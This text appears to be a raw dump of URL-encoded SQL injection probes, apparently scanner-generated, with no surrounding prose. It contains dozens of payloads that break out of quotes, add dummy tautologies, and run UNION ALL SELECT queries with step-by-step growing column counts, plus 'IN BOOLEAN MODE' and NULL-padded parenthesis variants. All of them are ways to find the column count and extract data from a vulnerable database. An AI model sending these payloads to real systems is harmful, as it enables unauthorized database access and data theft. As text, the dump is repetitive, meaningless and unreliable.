-9629%27%7C%7C%28SELECT%20%27GbGl%27%20WHERE%203928%3D3928%20UNION%20ALL%20SELECT%203928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%2C3928%23 -6353%27%2B%28SELECT%20DorW%20WHERE%207046%3D7046%20UNION%20ALL%20SELECT%207046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%23 -6812%27%2B%28SELECT%20Wnep%20WHERE%204255%3D4255%20UNION%20ALL%20SELECT%204255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%2C4255%23 -2983%27%2B%28SELECT%20qJax%20WHERE%202978%3D2978%20UNION%20ALL%20SELECT%202978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%2C2978%23 -5615%27%2B%28SELECT%20mZyn%20WHERE%202095%3D2095%20UNION%20ALL%20SELECT%202095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%2C2095%23 -1107%27%2B%28SELECT%20PUgs%20WHERE%208035%3D8035%20UNION%20ALL%20SELECT%208035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%23 -4927%27%2B%28SELECT%20yftn%20WHERE%206456%3D6456%20UNION%20ALL%20SELECT%206456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%2C6456%23 -8276%27%2B%28SELECT%20bzen%20WHERE%205833%3D5833%20UNION%20ALL%20SELECT%205833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%23 -4817%27%2B%28SELECT%20nFbK%20WHERE%204111%3D4111%20UNION%20ALL%20SELECT%204111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%2C4111%23 -1275%27%2B%28SELECT%20JOzW%20WHERE%206915%3D6915%20UNION%20ALL%20SELECT%206915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%2C6915%23 -2531%27%2B%28SELECT%20WVAF%20WHERE%203592%3D3592%20UNION%20ALL%20SELECT%203592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%23 -5372%27%2B%28SELECT%20%27uuri%27%20WHERE%206469%3D6469%20UNION%20ALL%20SELECT%206469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%2C6469%23 -7539%27%2B%28SELECT%20%27zakg%27%20WHERE%205462%3D5462%20UNION%20ALL%20SELECT%205462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%2C5462%23 -2745%27%2B%28SELECT%20%27aHor%27%20WHERE%209449%3D9449%20UNION%20ALL%20SELECT%209449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%2C9449%23 -9558%27%2B%28SELECT%20%27FDfj%27%20WHERE%203666%3D3666%20UNION%20ALL%20SELECT%203666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%23 -3236%27%2B%28SELECT%20%27XoNd%27%20WHERE%204019%3D4019%20UNION%20ALL%20SELECT%204019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%2C4019%23 -2595%27%2B%28SELECT%20%27XOVn%27%20WHERE%201443%3D1443%20UNION%20ALL%20SELECT%201443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%23 -6135%27%2B%28SELECT%20%27sgHw%27%20WHERE%204654%3D4654%20UNION%20ALL%20SELECT%204654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%23 -9392%27%2B%28SELECT%20%27SUAy%27%20WHERE%202111%3D2111%20UNION%20ALL%20SELECT%202111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%2C2111%23 -2229%27%2B%28SELECT%20%27vWKI%27%20WHERE%202669%3D2669%20UNION%20ALL%20SELECT%202669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%23 -3252%27%2B%28SELECT%20%27HpQw%27%20WHERE%201020%3D1020%20UNION%20ALL%20SELECT%201020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%23 -1989%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%2C1444%23 -1697%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%2C9431%23 -7985%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%2C7293%23 -9419%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%23 -4352%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%23 -4623%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%2C7748%23 -9401%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%23 -7174%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%23 -3932%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%23 -8121%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 